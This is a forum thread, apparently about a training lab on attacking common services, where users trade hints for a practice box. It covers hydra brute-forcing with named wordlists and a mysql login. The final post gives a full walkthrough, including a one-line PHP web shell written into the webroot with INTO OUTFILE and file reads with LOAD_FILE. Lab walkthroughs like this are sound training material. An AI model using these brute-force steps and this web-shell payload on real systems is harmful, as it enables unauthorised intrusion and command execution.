Attacking common services - easy

rednanof · January 26, 2023, 7:35pm

I’m really stuck on this exercise, I got the username “fiona” but the password list provided in resources doesn’t work. I have tried to encode it in base64, since when I do auth login to the smtp service it returns the encoded response. I have also encoded the username fiona, and finally I have also tried the list of passwords in base64 without the ==, but it does not work.

I have tried the list of passwords in plain text with the username fiona for all the services and none of them work, can someone help me ? Thank you.

M00th · January 27, 2023, 4:46am

I’ve discovered in several modules the provided password list doesn’t have the answer (neither does mutation). I recommend trying other password lists commonly talked about and used. Also located on the pwnbox. If you need further hints feel free to DM me

suryateja · February 22, 2023, 10:13am

Use the eternal wordlist : rockyou.txt

splinter · March 7, 2023, 10:45pm

Box times out before hydra can get through rockyou! I feel like I am missing something with this. I have tried all kinds of lists …rockyou would be the logical choice but takes too long…

suryateja · March 9, 2023, 9:26am

While bruteforcing, give the username as: fiona@inlanefreight.htb

splinter · March 9, 2023, 4:28pm

thank you!

rednanof · March 16, 2023, 10:28am

Any help?

cryproot · March 18, 2023, 4:26am

Can someone give me some advice, I have entered mysql with the credentials f*** and the pass 9***, but within it I understand that I must upload a file, or how can I do it, I need some advice I am stuck

cbr0t · March 19, 2023, 5:03pm

im stuck on trying to upgrade my shell. ive uploaded it via the ftp server but can get it to execute. what am i missing?

sakis17 · April 2, 2023, 5:53pm

Hi, can anyone suggest me what wordlist (not rockyou) to use…
I’m bruteforcing the ftp service

architvats96 · August 29, 2023, 1:42pm

You can try darkweb2017-top1000 or rockyou-20 as well. Just remember to set username in the format @<domain_name>.

w2xim3 · August 28, 2024, 6:13pm

After finding the creds, I reused them on another service, and the LOAD_FILE function helped me out

raynus4 · October 26, 2024, 2:05am

smtp-user-enum to get fiona user
hydra -l fiona@inlanefreight.htb -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt
use fiona and the password 9******** to access mysql
mysql> SELECT “<?php echo shell_exec($_GET['cmd']);?>” INTO OUTFILE ‘c:\xampp\htdocs\webshell2.php’
http*******/webshell2.php?cmd= dir c:\users\ /s flag.txt → to search for flag.txt location
use LOAD_FILE to obtain the flag

It’s harder than I though for ‘Easy’

Topic		Replies	Views
Login Brute Forcing Module - Skill Assessment Academy	9	657	July 25, 2023
Academy Lab - Attacking Common Services - Easy - Very Long Brute Force Time Academy	3	849	May 3, 2024
LOGIN BRUTE FORCING - Skills Assessment - Website Academy	24	4514	September 10, 2024
Service Authentication Brute Forcing - SSH Attack Academy	5	1599	February 9, 2023
Attacking Common Services - Easy - Finding User Account to Brute Force Academy	6	1671	June 5, 2023

Attacking common services - easy

Related topics